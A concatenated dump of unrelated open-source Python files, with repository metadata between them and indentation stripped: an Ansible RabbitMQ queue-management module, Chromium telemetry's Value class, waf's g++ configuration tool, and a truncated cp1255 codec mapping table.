from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib import parse as urllib_parse
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
name=dict(required=True, type='str'),
login_user=dict(default='guest', type='str'),
login_password=dict(default='guest', type='str', no_log=True),
login_host=dict(default='localhost', type='str'),
login_port=dict(default='15672', type='str'),
vhost=dict(default='/', type='str'),
durable=dict(default=True, type='bool'),
auto_delete=dict(default=False, type='bool'),
message_ttl=dict(default=None, type='int'),
auto_expires=dict(default=None, type='int'),
max_length=dict(default=None, type='int'),
dead_letter_exchange=dict(default=None, type='str'),
dead_letter_routing_key=dict(default=None, type='str'),
arguments=dict(default=dict(), type='dict'),
max_priority=dict(default=None, type='int')
),
supports_check_mode=True
)
url = "http://%s:%s/api/queues/%s/%s" % (
module.params['login_host'],
module.params['login_port'],
urllib_parse.quote(module.params['vhost'], ''),
module.params['name']
)
if not HAS_REQUESTS:
module.fail_json(msg="requests library is required for this module. To install, use `pip install requests`")
result = dict(changed=False, name=module.params['name'])
# Check if queue already exists
r = requests.get(url, auth=(module.params['login_user'], module.params['login_password']))
if r.status_code == 200:
queue_exists = True
response = r.json()
elif r.status_code == 404:
queue_exists = False
response = r.text
else:
module.fail_json(
msg="Invalid response from RESTAPI when trying to check if queue exists",
details=r.text
)
if module.params['state'] == 'present':
change_required = not queue_exists
else:
change_required = queue_exists
# Check if attributes change on existing queue
if not change_required and r.status_code == 200 and module.params['state'] == 'present':
if not (
response['durable'] == module.params['durable'] and
response['auto_delete'] == module.params['auto_delete'] and
(
('x-message-ttl' in response['arguments'] and response['arguments']['x-message-ttl'] == module.params['message_ttl']) or
('x-message-ttl' not in response['arguments'] and module.params['message_ttl'] is None)
) and
(
('x-expires' in response['arguments'] and response['arguments']['x-expires'] == module.params['auto_expires']) or
('x-expires' not in response['arguments'] and module.params['auto_expires'] is None)
) and
(
('x-max-length' in response['arguments'] and response['arguments']['x-max-length'] == module.params['max_length']) or
('x-max-length' not in response['arguments'] and module.params['max_length'] is None)
) and
(
('x-dead-letter-exchange' in response['arguments'] and
response['arguments']['x-dead-letter-exchange'] == module.params['dead_letter_exchange']) or
('x-dead-letter-exchange' not in response['arguments'] and module.params['dead_letter_exchange'] is None)
) and
(
('x-dead-letter-routing-key' in response['arguments'] and
response['arguments']['x-dead-letter-routing-key'] == module.params['dead_letter_routing_key']) or
('x-dead-letter-routing-key' not in response['arguments'] and module.params['dead_letter_routing_key'] is None)
) and
(
('x-max-priority' in response['arguments'] and
response['arguments']['x-max-priority'] == module.params['max_priority']) or
('x-max-priority' not in response['arguments'] and module.params['max_priority'] is None)
)
):
module.fail_json(
msg="RabbitMQ RESTAPI doesn't support attribute changes for existing queues",
)
# Copy parameters to arguments as used by RabbitMQ
for k, v in {
'message_ttl': 'x-message-ttl',
'auto_expires': 'x-expires',
'max_length': 'x-max-length',
'dead_letter_exchange': 'x-dead-letter-exchange',
'dead_letter_routing_key': 'x-dead-letter-routing-key',
'max_priority': 'x-max-priority'
}.items():
if module.params[k] is not None:
module.params['arguments'][v] = module.params[k]
# Exit if check_mode
if module.check_mode:
result['changed'] = change_required
result['details'] = response
result['arguments'] = module.params['arguments']
module.exit_json(**result)
# Do changes
if change_required:
if module.params['state'] == 'present':
r = requests.put(
url,
auth=(module.params['login_user'], module.params['login_password']),
headers={"content-type": "application/json"},
data=json.dumps({
"durable": module.params['durable'],
"auto_delete": module.params['auto_delete'],
"arguments": module.params['arguments']
})
)
elif module.params['state'] == 'absent':
r = requests.delete(url, auth=(module.params['login_user'], module.params['login_password']))
# RabbitMQ 3.6.7 changed this response code from 204 to 201
if r.status_code == 204 or r.status_code == 201:
result['changed'] = True
module.exit_json(**result)
else:
module.fail_json(
msg="Error creating queue",
status=r.status_code,
details=r.text
)
else:
result['changed'] = False
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
sgraham/nope
|
tools/telemetry/telemetry/value/__init__.py
|
1
|
12490
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
The Value hierarchy provides a way of representing the values measurements
produce such that they can be merged across runs, grouped by page, and output
to different targets.
The core Value concept provides the basic functionality:
- association with a page, may be none
- naming and units
- importance tracking [whether a value will show up on a waterfall or output
file by default]
- other metadata, such as a description of what was measured
- default conversion to scalar and string
- merging properties
A page may actually run a few times during a single telemetry session.
Downstream consumers of test results typically want to group these runs
together, then compute summary statistics across runs. Value provides the
Merge* family of methods for this kind of aggregation.
"""
import os
from telemetry.core import discover
from telemetry.core import util
# When combining a pair of Values togehter, it is sometimes ambiguous whether
# the values should be concatenated, or one should be picked as representative.
# The possible merging policies are listed here.
CONCATENATE = 'concatenate'
PICK_FIRST = 'pick-first'
# When converting a Value to its buildbot equivalent, the context in which the
# value is being interpreted actually affects the conversion. This is insane,
# but there you have it. There are three contexts in which Values are converted
# for use by buildbot, represented by these output-intent values.
PER_PAGE_RESULT_OUTPUT_CONTEXT = 'per-page-result-output-context'
COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT = 'merged-pages-result-output-context'
SUMMARY_RESULT_OUTPUT_CONTEXT = 'summary-result-output-context'
class Value(object):
"""An abstract value produced by a telemetry page test.
"""
def __init__(self, page, name, units, important, description,
interaction_record):
"""A generic Value object.
Args:
page: A Page object, may be given as None to indicate that the value
represents results for multiple pages.
name: A value name string, may contain a dot. Values from the same test
with the same prefix before the dot may be considered to belong to
the same chart.
units: A units string.
important: Whether the value is "important". Causes the value to appear
by default in downstream UIs.
description: A string explaining in human-understandable terms what this
value represents.
interaction_record: The string label of the TimelineInteractionRecord with
which this value is associated.
"""
# TODO(eakuefner): Check user story here after migration (crbug.com/442036)
if not isinstance(name, basestring):
raise ValueError('name field of Value must be string.')
if not isinstance(units, basestring):
raise ValueError('units field of Value must be string.')
if not isinstance(important, bool):
raise ValueError('important field of Value must be bool.')
if not ((description is None) or isinstance(description, basestring)):
raise ValueError('description field of Value must absent or string.')
if not ((interaction_record is None) or
isinstance(interaction_record, basestring)):
raise ValueError('interaction_record field of Value must absent or '
'string.')
self.page = page
self.name = name
self.units = units
self.important = important
self.description = description
self.interaction_record = interaction_record
def IsMergableWith(self, that):
return (self.units == that.units and
type(self) == type(that) and
self.important == that.important and
self.interaction_record == that.interaction_record)
@classmethod
def MergeLikeValuesFromSamePage(cls, values):
"""Combines the provided list of values into a single compound value.
When a page runs multiple times, it may produce multiple values. This
function is given the same-named values across the multiple runs, and has
the responsibility of producing a single result.
It must return a single Value. If merging does not make sense, the
implementation must pick a representative value from one of the runs.
For instance, it may be given
[ScalarValue(page, 'a', 1), ScalarValue(page, 'a', 2)]
and it might produce
ListOfScalarValues(page, 'a', [1, 2])
"""
raise NotImplementedError()
@classmethod
def MergeLikeValuesFromDifferentPages(cls, values,
group_by_name_suffix=False):
"""Combines the provided values into a single compound value.
When a full pageset runs, a single value_name will usually end up getting
collected for multiple pages. For instance, we may end up with
[ScalarValue(page1, 'a', 1),
ScalarValue(page2, 'a', 2)]
This function takes in the values of the same name, but across multiple
pages, and produces a single summary result value. In this instance, it
could produce a ScalarValue(None, 'a', 1.5) to indicate averaging, or even
ListOfScalarValues(None, 'a', [1, 2]) if concatenated output was desired.
Some results are so specific to a page that they make no sense when
aggregated across pages. If merging values of this type across pages is
non-sensical, this method may return None.
If group_by_name_suffix is True, then x.z and y.z are considered to be the
same value and are grouped together. If false, then x.z and y.z are
considered different.
"""
raise NotImplementedError()
def _IsImportantGivenOutputIntent(self, output_context):
if output_context == PER_PAGE_RESULT_OUTPUT_CONTEXT:
return False
elif output_context == COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT:
return self.important
elif output_context == SUMMARY_RESULT_OUTPUT_CONTEXT:
return self.important
def GetBuildbotDataType(self, output_context):
"""Returns the buildbot's equivalent data_type.
This should be one of the values accepted by perf_tests_results_helper.py.
"""
raise NotImplementedError()
def GetBuildbotValue(self):
"""Returns the buildbot's equivalent value."""
raise NotImplementedError()
def GetChartAndTraceNameForPerPageResult(self):
chart_name, _ = _ConvertValueNameToChartAndTraceName(self.name)
trace_name = self.page.display_name
return chart_name, trace_name
@property
def name_suffix(self):
"""Returns the string after a . in the name, or the full name otherwise."""
if '.' in self.name:
return self.name.split('.', 1)[1]
else:
return self.name
def GetChartAndTraceNameForComputedSummaryResult(
self, trace_tag):
chart_name, trace_name = (
_ConvertValueNameToChartAndTraceName(self.name))
if trace_tag:
return chart_name, trace_name + trace_tag
else:
return chart_name, trace_name
def GetRepresentativeNumber(self):
"""Gets a single scalar value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
def GetRepresentativeString(self):
"""Gets a string value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
@staticmethod
def GetJSONTypeName():
"""Gets the typename for serialization to JSON using AsDict."""
raise NotImplementedError()
def AsDict(self):
"""Pre-serializes a value to a dict for output as JSON."""
return self._AsDictImpl()
def _AsDictImpl(self):
d = {
'name': self.name,
'type': self.GetJSONTypeName(),
'units': self.units,
'important': self.important
}
if self.description:
d['description'] = self.description
if self.interaction_record:
d['interaction_record'] = self.interaction_record
if self.page:
d['page_id'] = self.page.id
return d
def AsDictWithoutBaseClassEntries(self):
full_dict = self.AsDict()
base_dict_keys = set(self._AsDictImpl().keys())
# Extracts only entries added by the subclass.
return dict([(k, v) for (k, v) in full_dict.iteritems()
if k not in base_dict_keys])
@staticmethod
def FromDict(value_dict, page_dict):
"""Produces a value from a value dict and a page dict.
Value dicts are produced by serialization to JSON, and must be accompanied
by a dict mapping page IDs to pages, also produced by serialization, in
order to be completely deserialized. If deserializing multiple values, use
ListOfValuesFromListOfDicts instead.
value_dict: a dictionary produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
return Value.ListOfValuesFromListOfDicts([value_dict], page_dict)[0]
@staticmethod
def ListOfValuesFromListOfDicts(value_dicts, page_dict):
"""Takes a list of value dicts to values.
Given a list of value dicts produced by AsDict, this method
deserializes the dicts given a dict mapping page IDs to pages.
This method performs memoization for deserializing a list of values
efficiently, where FromDict is meant to handle one-offs.
values: a list of value dicts produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
value_dir = os.path.dirname(__file__)
value_classes = discover.DiscoverClasses(
value_dir, util.GetTelemetryDir(),
Value, index_by_class_name=True)
value_json_types = dict((value_classes[x].GetJSONTypeName(), x) for x in
value_classes)
values = []
for value_dict in value_dicts:
value_class = value_classes[value_json_types[value_dict['type']]]
assert 'FromDict' in value_class.__dict__, \
'Subclass doesn\'t override FromDict'
values.append(value_class.FromDict(value_dict, page_dict))
return values
@staticmethod
def GetConstructorKwArgs(value_dict, page_dict):
"""Produces constructor arguments from a value dict and a page dict.
Takes a dict parsed from JSON and an index of pages and recovers the
keyword arguments to be passed to the constructor for deserializing the
dict.
value_dict: a dictionary produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
d = {
'name': value_dict['name'],
'units': value_dict['units']
}
description = value_dict.get('description', None)
if description:
d['description'] = description
else:
d['description'] = None
page_id = value_dict.get('page_id', None)
if page_id:
d['page'] = page_dict[int(page_id)]
else:
d['page'] = None
d['important'] = False
interaction_record = value_dict.get('interaction_record', None)
if interaction_record:
d['interaction_record'] = interaction_record
else:
d['interaction_record'] = None
return d
def ValueNameFromTraceAndChartName(trace_name, chart_name=None):
"""Mangles a trace name plus optional chart name into a standard string.
A value might just be a bareword name, e.g. numPixels. In that case, its
chart may be None.
But, a value might also be intended for display with other values, in which
case the chart name indicates that grouping. So, you might have
screen.numPixels, screen.resolution, where chartName='screen'.
"""
assert trace_name != 'url', 'The name url cannot be used'
if chart_name:
return '%s.%s' % (chart_name, trace_name)
else:
assert '.' not in trace_name, ('Trace names cannot contain "." with an '
'empty chart_name since this is used to delimit chart_name.trace_name.')
return trace_name
def _ConvertValueNameToChartAndTraceName(value_name):
"""Converts a value_name into the equivalent chart-trace name pair.
Buildbot represents values by the measurement name and an optional trace name,
whereas telemetry represents values with a chart_name.trace_name convention,
where chart_name is optional. This convention is also used by chart_json.
This converts from the telemetry convention to the buildbot convention,
returning a 2-tuple (measurement_name, trace_name).
"""
if '.' in value_name:
return value_name.split('.', 1)
else:
return value_name, value_name
|
bsd-3-clause
|
mfisher31/libjuce
|
waflib/Tools/gxx.py
|
56
|
4064
|
#!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2018 (ita)
# Ralf Habacker, 2006 (rh)
# Yinon Ehrlich, 2009
"""
g++/llvm detection.
"""
from waflib.Tools import ccroot, ar
from waflib.Configure import conf
@conf
def find_gxx(conf):
"""
Finds the program g++, and if present, try to detect its version number
"""
cxx = conf.find_program(['g++', 'c++'], var='CXX')
conf.get_cc_version(cxx, gcc=True)
conf.env.CXX_NAME = 'gcc'
@conf
def gxx_common_flags(conf):
"""
Common flags for g++ on nearly all platforms
"""
v = conf.env
v.CXX_SRC_F = []
v.CXX_TGT_F = ['-c', '-o']
if not v.LINK_CXX:
v.LINK_CXX = v.CXX
v.CXXLNK_SRC_F = []
v.CXXLNK_TGT_F = ['-o']
v.CPPPATH_ST = '-I%s'
v.DEFINES_ST = '-D%s'
v.LIB_ST = '-l%s' # template for adding libs
v.LIBPATH_ST = '-L%s' # template for adding libpaths
v.STLIB_ST = '-l%s'
v.STLIBPATH_ST = '-L%s'
v.RPATH_ST = '-Wl,-rpath,%s'
v.SONAME_ST = '-Wl,-h,%s'
v.SHLIB_MARKER = '-Wl,-Bdynamic'
v.STLIB_MARKER = '-Wl,-Bstatic'
v.cxxprogram_PATTERN = '%s'
v.CXXFLAGS_cxxshlib = ['-fPIC']
v.LINKFLAGS_cxxshlib = ['-shared']
v.cxxshlib_PATTERN = 'lib%s.so'
v.LINKFLAGS_cxxstlib = ['-Wl,-Bstatic']
v.cxxstlib_PATTERN = 'lib%s.a'
v.LINKFLAGS_MACBUNDLE = ['-bundle', '-undefined', 'dynamic_lookup']
v.CXXFLAGS_MACBUNDLE = ['-fPIC']
v.macbundle_PATTERN = '%s.bundle'
@conf
def gxx_modifier_win32(conf):
"""Configuration flags for executing gcc on Windows"""
v = conf.env
v.cxxprogram_PATTERN = '%s.exe'
v.cxxshlib_PATTERN = '%s.dll'
v.implib_PATTERN = '%s.dll.a'
v.IMPLIB_ST = '-Wl,--out-implib,%s'
v.CXXFLAGS_cxxshlib = []
# Auto-import is enabled by default even without this option,
# but enabling it explicitly has the nice effect of suppressing the rather boring, debug-level messages
# that the linker emits otherwise.
v.append_value('LINKFLAGS', ['-Wl,--enable-auto-import'])
@conf
def gxx_modifier_cygwin(conf):
"""Configuration flags for executing g++ on Cygwin"""
gxx_modifier_win32(conf)
v = conf.env
v.cxxshlib_PATTERN = 'cyg%s.dll'
v.append_value('LINKFLAGS_cxxshlib', ['-Wl,--enable-auto-image-base'])
v.CXXFLAGS_cxxshlib = []
@conf
def gxx_modifier_darwin(conf):
"""Configuration flags for executing g++ on MacOS"""
v = conf.env
v.CXXFLAGS_cxxshlib = ['-fPIC']
v.LINKFLAGS_cxxshlib = ['-dynamiclib']
v.cxxshlib_PATTERN = 'lib%s.dylib'
v.FRAMEWORKPATH_ST = '-F%s'
v.FRAMEWORK_ST = ['-framework']
v.ARCH_ST = ['-arch']
v.LINKFLAGS_cxxstlib = []
v.SHLIB_MARKER = []
v.STLIB_MARKER = []
v.SONAME_ST = []
@conf
def gxx_modifier_aix(conf):
"""Configuration flags for executing g++ on AIX"""
v = conf.env
v.LINKFLAGS_cxxprogram= ['-Wl,-brtl']
v.LINKFLAGS_cxxshlib = ['-shared', '-Wl,-brtl,-bexpfull']
v.SHLIB_MARKER = []
@conf
def gxx_modifier_hpux(conf):
v = conf.env
v.SHLIB_MARKER = []
v.STLIB_MARKER = []
v.CFLAGS_cxxshlib = ['-fPIC','-DPIC']
v.cxxshlib_PATTERN = 'lib%s.sl'
@conf
def gxx_modifier_openbsd(conf):
conf.env.SONAME_ST = []
@conf
def gcc_modifier_osf1V(conf):
v = conf.env
v.SHLIB_MARKER = []
v.STLIB_MARKER = []
v.SONAME_ST = []
@conf
def gxx_modifier_platform(conf):
"""Execute platform-specific functions based on *gxx_modifier_+NAME*"""
# * set configurations specific for a platform.
# * the destination platform is detected automatically by looking at the macros the compiler predefines,
# and if it's not recognised, it fallbacks to sys.platform.
gxx_modifier_func = getattr(conf, 'gxx_modifier_' + conf.env.DEST_OS, None)
if gxx_modifier_func:
gxx_modifier_func()
def configure(conf):
"""
Configuration for g++
"""
conf.find_gxx()
conf.find_ar()
conf.gxx_common_flags()
conf.gxx_modifier_platform()
conf.cxx_load_tools()
conf.cxx_add_flags()
conf.link_add_flags()
conf.check_gcc_o_space('cxx')
|
gpl-2.0
|
QLGu/Django-facebook
|
docs/docs_env/Lib/encodings/cp1255.py
|
593
|
12722
|
""" Python Character Mapping Codec cp1255 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1255.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp1255',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\u20ac' # 0x80 -> EURO SIGN
u'\ufffe' # 0x81 -> UNDEFINED
u'\u201a' # 0x82 -> SINGLE LOW-9 QUOTATION MARK
u'\u0192' # 0x83 -> LATIN SMALL LETTER F WITH HOOK
u'\u201e' # 0x84 -> DOUBLE LOW-9 QUOTATION MARK
u'\u2026' # 0x85 -> HORIZONTAL ELLIPSIS
u'\u2020' # 0x86 -> DAGGER
u'\u2021' # 0x87 -> DOUBLE DAGGER
u'\u02c6' # 0x88 -> MODIFIER LETTER CIRCUMFLEX ACCENT
u'\u2030' # 0x89 -> PER MILLE SIGN
u'\ufffe' # 0x8A -> UNDEFINED
u'\u2039' # 0x8B -> SINGLE LEFT-POINTING ANGLE QUOTATION MARK
u'\ufffe' # 0x8C -> UNDEFINED
u'\ufffe' # 0x8D -> UNDEFINED
u'\ufffe' # 0x8E -> UNDEFINED
u'\ufffe' # 0x8F -> UNDEFINED
u'\ufffe' # 0x90 -> UNDEFINED
u'\u2018' # 0x91 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0x92 -> RIGHT SINGLE QUOTATION MARK
u'\u201c' # 0x93 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0x94 -> RIGHT DOUBLE QUOTATION MARK
u'\u2022' # 0x95 -> BULLET
u'\u2013' # 0x96 -> EN DASH
u'\u2014' # 0x97 -> EM DASH
u'\u02dc' # 0x98 -> SMALL TILDE
u'\u2122' # 0x99 -> TRADE MARK SIGN
u'\ufffe' # 0x9A -> UNDEFINED
u'\u203a' # 0x9B -> SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
u'\ufffe' # 0x9C -> UNDEFINED
u'\ufffe' # 0x9D -> UNDEFINED
u'\ufffe' # 0x9E -> UNDEFINED
u'\ufffe' # 0x9F -> UNDEFINED
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\xa1' # 0xA1 -> INVERTED EXCLAMATION MARK
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\u20aa' # 0xA4 -> NEW SHEQEL SIGN
u'\xa5' # 0xA5 -> YEN SIGN
u'\xa6' # 0xA6 -> BROKEN BAR
u'\xa7' # 0xA7 -> SECTION SIGN
u'\xa8' # 0xA8 -> DIAERESIS
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\xd7' # 0xAA -> MULTIPLICATION SIGN
u'\xab' # 0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xac' # 0xAC -> NOT SIGN
u'\xad' # 0xAD -> SOFT HYPHEN
u'\xae' # 0xAE -> REGISTERED SIGN
u'\xaf' # 0xAF -> MACRON
u'\xb0' # 0xB0 -> DEGREE SIGN
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\xb2' # 0xB2 -> SUPERSCRIPT TWO
u'\xb3' # 0xB3 -> SUPERSCRIPT THREE
u'\xb4' # 0xB4 -> ACUTE ACCENT
u'\xb5' # 0xB5 -> MICRO SIGN
u'\xb6' # 0xB6 -> PILCROW SIGN
u'\xb7' # 0xB7 -> MIDDLE DOT
u'\xb8' # 0xB8 -> CEDILLA
u'\xb9' # 0xB9 -> SUPERSCRIPT ONE
u'\xf7' # 0xBA -> DIVISION SIGN
u'\xbb' # 0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbc' # 0xBC -> VULGAR FRACTION ONE QUARTER
u'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
u'\xbe' # 0xBE -> VULGAR FRACTION THREE QUARTERS
u'\xbf' # 0xBF -> INVERTED QUESTION MARK
u'\u05b0' # 0xC0 -> HEBREW POINT SHEVA
u'\u05b1' # 0xC1 -> HEBREW POINT HATAF SEGOL
u'\u05b2' # 0xC2 -> HEBREW POINT HATAF PATAH
u'\u05b3' # 0xC3 -> HEBREW POINT HATAF QAMATS
u'\u05b4' # 0xC4 -> HEBREW POINT HIRIQ
u'\u05b5' # 0xC5 -> HEBREW POINT TSERE
u'\u05b6' # 0xC6 -> HEBREW POINT SEGOL
u'\u05b7' # 0xC7 -> HEBREW POINT PATAH
u'\u05b8' # 0xC8 -> HEBREW POINT QAMATS
u'\u05b9' # 0xC9 -> HEBREW POINT HOLAM
u'\ufffe' # 0xCA -> UNDEFINED
u'\u05bb' # 0xCB -> HEBREW POINT QUBUTS
u'\u05bc' # 0xCC -> HEBREW POINT DAGESH OR MAPIQ
u'\u05bd' # 0xCD -> HEBREW POINT METEG
u'\u05be' # 0xCE -> HEBREW PUNCTUATION MAQAF
u'\u05bf' # 0xCF -> HEBREW POINT RAFE
u'\u05c0' # 0xD0 -> HEBREW PUNCTUATION PASEQ
u'\u05c1' # 0xD1 -> HEBREW POINT SHIN DOT
u'\u05c2' # 0xD2 -> HEBREW POINT SIN DOT
u'\u05c3' # 0xD3 -> HEBREW PUNCTUATION SOF PASUQ
u'\u05f0' # 0xD4 -> HEBREW LIGATURE YIDDISH DOUBLE VAV
u'\u05f1' # 0xD5 -> HEBREW LIGATURE YIDDISH VAV YOD
u'\u05f2' # 0xD6 -> HEBREW LIGATURE YIDDISH DOUBLE YOD
u'\u05f3' # 0xD7 -> HEBREW PUNCTUATION GERESH
u'\u05f4' # 0xD8 -> HEBREW PUNCTUATION GERSHAYIM
u'\ufffe' # 0xD9 -> UNDEFINED
u'\ufffe' # 0xDA -> UNDEFINED
u'\ufffe' # 0xDB -> UNDEFINED
u'\ufffe' # 0xDC -> UNDEFINED
